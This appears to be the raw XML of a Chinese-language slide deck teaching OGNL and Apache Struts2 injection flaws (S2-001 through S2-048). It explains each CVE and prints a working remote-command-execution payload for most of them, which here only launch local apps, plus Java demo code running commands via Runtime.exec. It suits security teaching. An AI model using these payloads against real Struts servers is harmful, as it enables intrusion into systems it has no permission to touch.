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03" r:id="rId2"/>
    <p:sldId id="1104" r:id="rId3"/>
    <p:sldId id="1105" r:id="rId4"/>
    <p:sldId id="1106" r:id="rId5"/>
    <p:sldId id="1107" r:id="rId6"/>
  </p:sldIdLst>
  <p:sldSz cx="12196763" cy="685800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2023/3/11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4913A8D-92DF-A275-A652-AB108757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09" y="1268760"/>
            <a:ext cx="10297144" cy="511418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 rootUser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String, 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context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String, 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"user1"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"user2"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"zhangsan"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63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OgnlContext oc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OgnlContext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//ognl由root和context两部分组成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(rootUser);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(context);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 ognl的root的值的时候，直接写希望获取的值的名字就可以了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name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(String)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//tom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Integer score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//82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 ognl非root的值的时候，需要使用#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 name1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(Student)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"#context['user1']"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name2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(String)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"#user2.name"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//zhangsan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 score1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"#user1.score"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 score2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"#user2.score"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//63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//ognl的getValue函数可以直接执行java函数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 obj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"'helloworld'.length()"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//访问静态属性和方法的时候需要使用@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 obj2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"@java.lang.Runtime@getRuntime().exec('cmd.exe /c start dir')"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//getValue具有代码执行能力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//命令执行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OgnlContext context2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OgnlContext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"@java.lang.Runtime@getRuntime().exec('curl http://127.0.0.1:10000/')"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context2, context2.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"(\"@java.lang.Runtime@getRuntime().exec(\'open/Applications/Calculator.app/\')\")(glassy)(amadeus)"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,context,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11DEF-C55F-EF20-9E31-58C9D4329FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909693" y="692696"/>
            <a:ext cx="10297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OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>的最顶层对象是一个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对象，通常称这个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对象为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>context map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>或者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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>OGNL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>就在这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>context map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>中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D4A51-E542-69D7-429B-B7C8EFD2B754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漏洞基础原理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E5489-AA45-C975-2697-7E7FB9795313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固定的语句格式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F30D4E-6042-B1D9-FB38-EB1C4D62737B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="7960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S2-001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14B466-A60F-4A3A-8A37-48CFE2AC2DB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993925" y="786221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当参数值是形如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%{*}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的形式的时候，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会把这个值当做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OGNL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表达式去执行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F9394-6AAA-209C-A823-98A7041E0AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731738" y="2330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S2-003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AC7933-68F9-8E73-2101-092AECA6645A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993925" y="2330234"/>
            <a:ext cx="952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通过构造形如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(exp)(a)(b)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的形式的表达式，放入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ognl.setvalue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，最终会将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4FD4A9-155F-A612-8542-087D5104691E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="1517491"/>
            <a:ext cx="88753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%{@java.lang.Runtime@getRuntime().exec("open /Applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Calculator.app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/")}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2B86E-7F02-6AE6-093D-A20D08DE1C9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761156" y="3133489"/>
            <a:ext cx="1098187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http://www.glassy.com/test.action?(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'#context[\'xwork.MethodAccessor.denyMethodExecution\']=false'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)(a)(b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="294A5A"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)&amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'@java.lang.Runtime@getRuntime().exec(\'open /Applications/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notes.app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/\')'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)(a)(b)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B3188-0407-B869-7DB3-9CBF26B1DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731738" y="41437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F6C0B-C7CA-5514-20FF-539AF59D7999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017998" y="4143726"/>
            <a:ext cx="952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redirect:\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redirectAction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作为前缀参数来进行短路导航状态变化，后面用来跟一个期望的目标表达式。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B248B9-A992-46BC-932A-BBB939F56AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767825" y="5017343"/>
            <a:ext cx="111632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http://www.glassy.com/Struts2Demo_war_exploded/hello.action? redirect:${#a=(new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(new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>java.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[]{'/bin/bash', '-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>c','open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>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/'})).start()}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E5489-AA45-C975-2697-7E7FB9795313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固定的语句格式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B3188-0407-B869-7DB3-9CBF26B1DBEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="706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S2-019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F6C0B-C7CA-5514-20FF-539AF59D7999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995730" y="706968"/>
            <a:ext cx="952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debug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参数获取调试模式，如果模式是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command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，则把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expression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参最终放到了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B248B9-A992-46BC-932A-BBB939F56AF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745557" y="1580585"/>
            <a:ext cx="1098187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http://www.glassy.com/Struts2Demo_war_exploded/hello.action? debug=command&amp;expression=#a=(new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('open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/')).start()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32F8-2B60-3FCB-64E0-F2EEB73D4C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="27490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S2-045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0F776-AE93-1736-BC12-18716C0623C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995730" y="2749057"/>
            <a:ext cx="952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在处理上传文件出错的时候且错误信息中带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%{exp}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的时候，会把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CDB540-EDEF-6054-3A75-22DC4E036E11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709470" y="3317364"/>
            <a:ext cx="1050147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Content-Type:%{(#glassy='multipart/form-data’). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#a=(new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/Contents/MacOS/Notes')).start())}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075991-DFE3-CF0D-82BB-AECC33DD0F50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环境配置下的漏洞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EFF54-5D8C-9702-6B30-77A6CE524415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668053" y="278266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S2-048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740D9F-4CBB-AE4D-7064-0ADF2AA3AD11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1738289" y="2782669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Struts 1 plugin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Struts 1 action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2.3.x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版本，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处理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的时候会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ActionMessage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传给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3396E3-8C76-F227-DEA2-4A84F9B1C3CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668053" y="3574757"/>
            <a:ext cx="1071930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name=${(#glassy='multipart/form-data’).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(#a=(new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('/Applications/Notes.app/Contents/MacOS/Notes')).start())}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;age=11&amp;__checkbox_bustedBefore=true&amp;description=22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A25E26-BF46-DA17-1997-2E1D2DF74808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636076" y="8367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6C9A80-60FA-FCA8-A820-1ABB0EEFAEE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706312" y="836712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需要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jsp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s:url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s:a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标签中的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includeParams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属性为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get.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计算标签中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路径的时候，会把参数值带入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2441C-700F-F1F0-E7FB-64BAD69D58D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636076" y="1628800"/>
            <a:ext cx="1071930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http://www.glassy.com/Struts2Demo_war_exploded/hello.jsp?fakeParam=%{#a=(new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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>newjava.lang.String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[]{"/bin/bash","-c", "open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/"})).start()}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821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CFFBC9-DEA0-505B-D3BB-A3B758FB080F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171439" y="116632"/>
            <a:ext cx="607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问题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可以验证漏洞存在的语句是注入语句吗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28F35-278A-6794-D025-CA49AA83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80" y="2528901"/>
            <a:ext cx="5221141" cy="252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7912A5-ECEA-60C5-3C20-B0BFB216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13" y="2690231"/>
            <a:ext cx="4832621" cy="2358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3E4B16-DAC2-4683-50AC-5F2C690F9BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792871" y="1137030"/>
            <a:ext cx="15121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%{1 + 1}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A19D6-1A70-4AF3-6D15-624BF89F5F74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2569989" y="1137030"/>
            <a:ext cx="734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可以用来验证漏洞是否存在 语法正确可以执行 我们是否认为它为注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201458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1052</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>62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Consolas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2023-03-11T11:44:13Z</dcterms:modified>
</cp:coreProperties>
</file>